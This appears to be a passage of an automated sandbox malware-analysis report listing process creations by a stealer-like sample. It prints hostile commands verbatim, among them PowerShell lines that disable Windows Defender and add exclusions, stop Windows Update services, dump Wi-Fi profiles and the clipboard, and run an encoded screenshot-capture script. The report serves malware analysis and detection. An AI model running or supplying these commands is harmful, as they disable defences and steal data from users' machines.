UAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4kug0kj4\4kug0kj4.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES46F0.tmp" "c:\Users\user\AppData\Local\Temp\4kug0kj4\CSCF8A59A62395742289D2EBFCBD5DF8363.TMP"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\q5r0u5fp\q5r0u5fp.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES541F.tmp" "c:\Windows\System32\CSCF38C3B75506F4C2796D96D17B23CB45.TMP"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: unknown	Process created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe"
Source: unknown	Process created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe"
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Process created: C:\Users\user\Desktop\VaTlw2kNGc.exe "C:\Users\user\Desktop\VaTlw2kNGc.exe"	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe -pbeznogym	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe -pbeznogym	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Process created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Process created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe"	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Process created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe"	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe -pbeznogym	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? .scr'"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: unknown unknown	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: unknown unknown	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: unknown unknown	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: unknown unknown	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: unknown unknown	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: unknown unknown	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: unknown unknown	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe -pbeznogym
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Process created: C:\ProgramData\svchost.exe "C:\ProgramData\svchost.exe"
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Process created: C:\ProgramData\setup.exe "C:\ProgramData\setup.exe"
Source: C:\ProgramData\svchost.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe"
Source: C:\ProgramData\setup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\ProgramData\setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
Source: C:\ProgramData\setup.exe	Process created: unknown unknown
Source: C:\ProgramData\setup.exe	Process created: unknown unknown
Source: C:\ProgramData\setup.exe	Process created: unknown unknown
Source: C:\ProgramData\setup.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? .scr'
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\q5r0u5fp\q5r0u5fp.cmdline"
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAI